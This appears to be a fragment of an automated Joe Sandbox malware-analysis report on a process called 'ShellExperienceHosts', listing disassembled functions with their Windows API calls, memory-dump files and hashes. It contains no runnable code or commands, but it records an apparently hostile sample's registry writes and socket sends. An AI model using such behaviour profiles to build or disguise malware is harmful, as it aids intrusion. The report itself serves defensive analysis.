                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: EmptyRect$H_prolog3
                                                                            • String ID:
                                                                            • API String ID: 3752103406-0
                                                                            • Opcode ID: 742e7f157d94a65cf9dbf7050177d162a17f8317b786ca019eaacbb3171b1c6b
                                                                            • Instruction ID: bec49dcc5d10e7a8ecb79df9de9baf460427396b915d7aa98cd5af05fb0e38c0
                                                                            • Opcode Fuzzy Hash: 742e7f157d94a65cf9dbf7050177d162a17f8317b786ca019eaacbb3171b1c6b
                                                                            • Instruction Fuzzy Hash: 1A51A2F09016018FC754CF29C5886D9BBE4BF99318F2885BED65D9F252EB329506CF18
                                                                            Function 1000485A Relevance: 9.1, APIs: 6, Instructions: 91sleepsynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 100048E1
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 100048EC
                                                                            • Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 100048F9
                                                                            • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 10004914
                                                                            • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 1000491D
                                                                            • Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 1000492E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleObjectSingleSleepWait
                                                                            • String ID:
                                                                            • API String ID: 640476663-0
                                                                            • Opcode ID: f4c70dc776f0c36d6c3e242216426f5c740d9caf6da259f6a897f5b04df83c22
                                                                            • Instruction ID: db8a483aedded49ec56de4fe6a38a5b8db7edc3383aabb911f028b40afcbc516
                                                                            • Opcode Fuzzy Hash: f4c70dc776f0c36d6c3e242216426f5c740d9caf6da259f6a897f5b04df83c22
                                                                            • Instruction Fuzzy Hash: E6216AB61046548FD750EBA8CC8498BF3F9FF893507198B08E5948B395CA34DC05CBA4
                                                                            Function 6C7069A2 Relevance: 9.1, APIs: 6, Instructions: 86timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PtInRect.USER32(?,?,?), ref: 6C7069C1
                                                                            • ReleaseCapture.USER32 ref: 6C7069CF
                                                                            • PtInRect.USER32(?,?,?), ref: 6C706A24
                                                                            • InvalidateRect.USER32(?,?,00000001,?,?,?,6C705B1F,00000000,00000000,00000000), ref: 6C706A8E
                                                                            • SetTimer.USER32(?,0000EC16,00000050,00000000), ref: 6C706AB2
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$CaptureInvalidateReleaseTimer
                                                                            • String ID:
                                                                            • API String ID: 2903485716-0
                                                                            • Opcode ID: 73b3d1ae1b9231e41f1e2d6a717ba54101ff89b209148f20c4815d8a0da244ba
                                                                            • Instruction ID: 25cb805f92106ce869988aee6d798089556a8d1573f0ce75686423d41478feba
                                                                            • Opcode Fuzzy Hash: 73b3d1ae1b9231e41f1e2d6a717ba54101ff89b209148f20c4815d8a0da244ba
                                                                            • Instruction Fuzzy Hash: 6431AEB1741207EFDF149F20CA44BA9BBB8FF49359F10413AE929C3680DB30A960DB90
                                                                            Function 022352B0 Relevance: 9.1, APIs: 6, Instructions: 84registrysleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExW.ADVAPI32(80000002,10017554,00000000,00000102,?), ref: 02235359
                                                                            • RegDeleteValueW.ADVAPI32(?,10017568), ref: 02235369
                                                                            • RegSetValueExW.ADVAPI32(?,10017568,00000000,00000003,1001C6E0,000012A0), ref: 02235387
                                                                            • RegCloseKey.ADVAPI32(?), ref: 02235392
                                                                            • GetExitCodeProcess.KERNEL32(00000000,?), ref: 022353F2
                                                                            • Sleep.KERNEL32(00000BB8), ref: 0223540B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Value$CloseCodeDeleteExitOpenProcessSleep
                                                                            • String ID:
                                                                            • API String ID: 4289506047-0
                                                                            • Opcode ID: e48445a0fb638aff792993f9711fe44b6994354607bef0c7859c4fe8ed55e572
                                                                            • Instruction ID: 71612e34817251cbbbb4c9e845a18bac8c4da990b6faa629550c8c695106f933
                                                                            • Opcode Fuzzy Hash: e48445a0fb638aff792993f9711fe44b6994354607bef0c7859c4fe8ed55e572
                                                                            • Instruction Fuzzy Hash: FF31C0B06683819BE726CFB08844F797BB2BB4D308F984498F5899F142D3B0D592CB51
                                                                            Function 6C862582 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,6C862579,6C862D87,?,?,?,?,6C84C985,?,?,?,?,?,00000000,00000000), ref: 6C862590
                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6C86259E
                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6C8625B7
                                                                            • SetLastError.KERNEL32(00000000,?,?,6C84C985,?,?,?,?,?,00000000,00000000,00000000,?,?,?), ref: 6C862609
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastValue___vcrt_
                                                                            • String ID:
                                                                            • API String ID: 3852720340-0
                                                                            • Opcode ID: 0cd07d1a583335eaf0b1d769e5c551cd5d85a921f7c01d18c6bff26fdca7d27a
                                                                            • Instruction ID: e831d84c129bf4eb029bb96f84d7cc36331b5a4ab3acd0e7f088e87d35e9ab92
                                                                            • Opcode Fuzzy Hash: 0cd07d1a583335eaf0b1d769e5c551cd5d85a921f7c01d18c6bff26fdca7d27a
                                                                            • Instruction Fuzzy Hash: F701F53270D3175E97B0097B6F5CA5A2A74EB0237D7200B79E01042ED0EF55480597D4
                                                                            Function 6C862E75 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • type_info::operator==.LIBVCRUNTIME ref: 6C862F94
                                                                            • CallUnexpected.LIBVCRUNTIME ref: 6C86320D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CallUnexpectedtype_info::operator==
                                                                            • String ID: csm$csm$csm
                                                                            • API String ID: 2673424686-393685449
                                                                            • Opcode ID: b1739bcdea87006e9c5254a7062187fb614f3241ca286ee747da2b397dcd4a75
                                                                            • Instruction ID: cabce72f2204dcafe51d36e9667078d5da03fce3e089dcd7e79c94a0833f17de
                                                                            • Opcode Fuzzy Hash: b1739bcdea87006e9c5254a7062187fb614f3241ca286ee747da2b397dcd4a75
                                                                            • Instruction Fuzzy Hash: 09B17B71800209AFCF25DFAACA8499EB7B5FF04319F1449AAE8106BE11D335DA55CF91
                                                                            Function 031BFF6D Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __CreateFrameInfo.LIBCMT ref: 031BFF95
                                                                              • Part of subcall function 031BFA76: __getptd.LIBCMT ref: 031BFA84
                                                                              • Part of subcall function 031BFA76: __getptd.LIBCMT ref: 031BFA92
                                                                            • __getptd.LIBCMT ref: 031BFF9F
                                                                              • Part of subcall function 031B381A: __getptd_noexit.LIBCMT ref: 031B381D
                                                                              • Part of subcall function 031B381A: __amsg_exit.LIBCMT ref: 031B382A
                                                                            • __getptd.LIBCMT ref: 031BFFAD
                                                                            • __getptd.LIBCMT ref: 031BFFBB
                                                                            • __getptd.LIBCMT ref: 031BFFC6
                                                                            • _CallCatchBlock2.LIBCMT ref: 031BFFEC
                                                                              • Part of subcall function 031BFB1B: __CallSettingFrame@12.LIBCMT ref: 031BFB67
                                                                              • Part of subcall function 031C0093: __getptd.LIBCMT ref: 031C00A2
                                                                              • Part of subcall function 031C0093: __getptd.LIBCMT ref: 031C00B0
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 1602911419-0
                                                                            • Opcode ID: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
                                                                            • Instruction ID: ba62898c0369d320c8ccd90e234ec9fb627ac7c4c3bee86960b7f19f296bbd8e
                                                                            • Opcode Fuzzy Hash: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
                                                                            • Instruction Fuzzy Hash: 7511D2B9D00309DFDB00EFA4D844AEDBBB1FF0C310F10856AE824AB250DB389A659F51
                                                                            Function 100136A3 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __CreateFrameInfo.LIBCMT ref: 100136CB
                                                                              • Part of subcall function 1001325B: __getptd.LIBCMT ref: 10013269
                                                                              • Part of subcall function 1001325B: __getptd.LIBCMT ref: 10013277
                                                                            • __getptd.LIBCMT ref: 100136D5
                                                                              • Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
                                                                              • Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F
                                                                            • __getptd.LIBCMT ref: 100136E3
                                                                            • __getptd.LIBCMT ref: 100136F1
                                                                            • __getptd.LIBCMT ref: 100136FC
                                                                            • _CallCatchBlock2.LIBCMT ref: 10013722
                                                                              • Part of subcall function 10013300: __CallSettingFrame@12.LIBCMT ref: 1001334C
                                                                              • Part of subcall function 100137C9: __getptd.LIBCMT ref: 100137D8
                                                                              • Part of subcall function 100137C9: __getptd.LIBCMT ref: 100137E6
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 1602911419-0
                                                                            • Opcode ID: 9bbf850cd10a9d142d7ef01923f7ba9f09fdf63f4c6847773a26cfd91f606182
                                                                            • Instruction ID: 22efbb8b190092b33748bf873c8b025e1b03d977775ae1c5574abea826c94994
                                                                            • Opcode Fuzzy Hash: 9bbf850cd10a9d142d7ef01923f7ba9f09fdf63f4c6847773a26cfd91f606182
                                                                            • Instruction Fuzzy Hash: 06112BB5C04209DFDF10DFA4D445AEEBBB1FF48310F10806AF864AB251DB38AA559F50
                                                                            Function 6C7A0AC6 Relevance: 9.0, APIs: 6, Instructions: 48windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFocus.USER32 ref: 6C7A0ACA
                                                                              • Part of subcall function 6C7A0B66: GetWindowLongW.USER32(6C7A9C68,000000F0), ref: 6C7A0B81
                                                                              • Part of subcall function 6C7A0B66: GetClassNameW.USER32(6C7A9C68,?,0000000A), ref: 6C7A0B96
                                                                              • Part of subcall function 6C7A0B66: CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,combobox,000000FF,?,?,?,000000FF,6C7A9C68,6C741795,00000000), ref: 6C7A0BAD
                                                                            • GetParent.USER32(00000000), ref: 6C7A0AEB
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 6C7A0B0A
                                                                            • GetParent.USER32(00000000), ref: 6C7A0B18
                                                                            • GetDesktopWindow.USER32 ref: 6C7A0B20
                                                                            • SendMessageW.USER32(00000000,0000014F,00000000,00000000), ref: 6C7A0B34
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$LongParent$ClassCompareDesktopFocusMessageNameSendString
                                                                            • String ID:
                                                                            • API String ID: 1233893325-0
                                                                            • Opcode ID: c195a6918f13bba941bbf54c816da8e64e058295251021910e0367f407a9d7a9
                                                                            • Instruction ID: 44da91ec6c6ee4c03f5c87f43ad98074617269f102a89f926d8e404e0fc70810
                                                                            • Opcode Fuzzy Hash: c195a6918f13bba941bbf54c816da8e64e058295251021910e0367f407a9d7a9
                                                                            • Instruction Fuzzy Hash: 4AF0863220165277DB1226644F49F6E31796B56F6EF310634F913A3E849B24D903C2D6
                                                                            Function 1000D9BE Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __getptd.LIBCMT ref: 1000D9CA
                                                                              • Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
                                                                              • Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F
                                                                            • __amsg_exit.LIBCMT ref: 1000D9EA
                                                                            • __lock.LIBCMT ref: 1000D9FA
                                                                            • InterlockedDecrement.KERNEL32(?), ref: 1000DA17
                                                                            • _free.LIBCMT ref: 1000DA2A
                                                                            • InterlockedIncrement.KERNEL32(02D92830), ref: 1000DA42
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                            • String ID:
                                                                            • API String ID: 3470314060-0
                                                                            • Opcode ID: 4e920ccd90d0088b349a7666ce33f112c59c5ff822d0f6e49aec8d69fe8d2c9d
                                                                            • Instruction ID: a4a3804e7546e288cb55bc9b4da126fdc171610eea7e5ea66b0b3240b360b7e5
                                                                            • Opcode Fuzzy Hash: 4e920ccd90d0088b349a7666ce33f112c59c5ff822d0f6e49aec8d69fe8d2c9d
                                                                            • Instruction Fuzzy Hash: E2019235A057219BF701EF64988579EB3A1FF057D0F018116F851AB289CB34BA81CBE6
                                                                            Function 100048C7 Relevance: 9.0, APIs: 6, Instructions: 44sleepsynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 100048E1
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 100048EC
                                                                            • Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 100048F9
                                                                            • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 10004914
                                                                            • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 1000491D
                                                                            • Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 1000492E
                                                                              • Part of subcall function 10003F60: GetCurrentThreadId.KERNEL32 ref: 10003F65
                                                                              • Part of subcall function 10003F60: send.WS2_32(?,10017440,00000010,00000000), ref: 10003FC6
                                                                              • Part of subcall function 10003F60: SetEvent.KERNEL32(?), ref: 10003FE9
                                                                              • Part of subcall function 10003F60: InterlockedExchange.KERNEL32(?,00000000), ref: 10003FF5
                                                                              • Part of subcall function 10003F60: WSACloseEvent.WS2_32(?), ref: 10004003
                                                                              • Part of subcall function 10003F60: shutdown.WS2_32(?,00000001), ref: 1000401B
                                                                              • Part of subcall function 10003F60: closesocket.WS2_32(?), ref: 10004025
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                                                            • String ID:
                                                                            • API String ID: 1019945655-0
                                                                            • Opcode ID: 3a30db2477d7f785b2e787c45e20f2cfe3e7392a271029e59f364346de097013
                                                                            • Instruction ID: b3bd2b528433ae293362b27f5e3b1343b14dca1381540b702c4300f5d31fb9dc
                                                                            • Opcode Fuzzy Hash: 3a30db2477d7f785b2e787c45e20f2cfe3e7392a271029e59f364346de097013
                                                                            • Instruction Fuzzy Hash: 1AF096762046149BD210EBA9CC84D4BF3E9EFC8761B158B19F26987694CA71FC01CBA0
                                                                            Function 6C7DC456 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 198comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C7DC460
                                                                            • GetVersionExW.KERNEL32(?), ref: 6C7DC4DC
                                                                            • CoInitializeEx.OLE32(00000000,00000002), ref: 6C7DC66C
                                                                            • CoCreateInstance.OLE32(6C89BAA8,00000000,00000001,6C8A3614,?), ref: 6C7DC6B3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CreateH_prolog3_InitializeInstanceVersion
                                                                            • String ID: @
                                                                            • API String ID: 1117250964-2766056989
                                                                            • Opcode ID: fc0b1920ddbaf26d12f9662a073db07a6feb7fa053d9e9733d22acf323771602
                                                                            • Instruction ID: e14d6b7308bf23a0e78c664a4363e1d7270a68d7eeeb79d79db1619bb1329ae4
                                                                            • Opcode Fuzzy Hash: fc0b1920ddbaf26d12f9662a073db07a6feb7fa053d9e9733d22acf323771602
                                                                            • Instruction Fuzzy Hash: C9815AB0B01616AFD754DF28CA44BD9BBF4BF09325F01426AE818D7740DB30A955CFA5
                                                                            Function 6C75690A Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C756911
                                                                              • Part of subcall function 6C7C2EEA: __EH_prolog3.LIBCMT ref: 6C7C2EF1
                                                                              • Part of subcall function 6C770A0E: GetDlgCtrlID.USER32(?), ref: 6C770A19
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: H_prolog3$Ctrl
                                                                            • String ID: %TsBasePane-%d$%TsBasePane-%d%x$BasePanes$IsVisible
                                                                            • API String ID: 3879667756-2169875744
                                                                            • Opcode ID: 7f9d5bbd93e353fdef8f974c399cb3111feecc1458872a3b4850a8d95095d9e0
                                                                            • Instruction ID: 5dfbf864540a9c9c1aee894818808ef512a3ba9fe5f04a01e378cd148a193557
                                                                            • Opcode Fuzzy Hash: 7f9d5bbd93e353fdef8f974c399cb3111feecc1458872a3b4850a8d95095d9e0
                                                                            • Instruction Fuzzy Hash: B131D471A002099BCF10DFA4CD98DFDB775BF8A318F140668E512B7790CB309915DB51
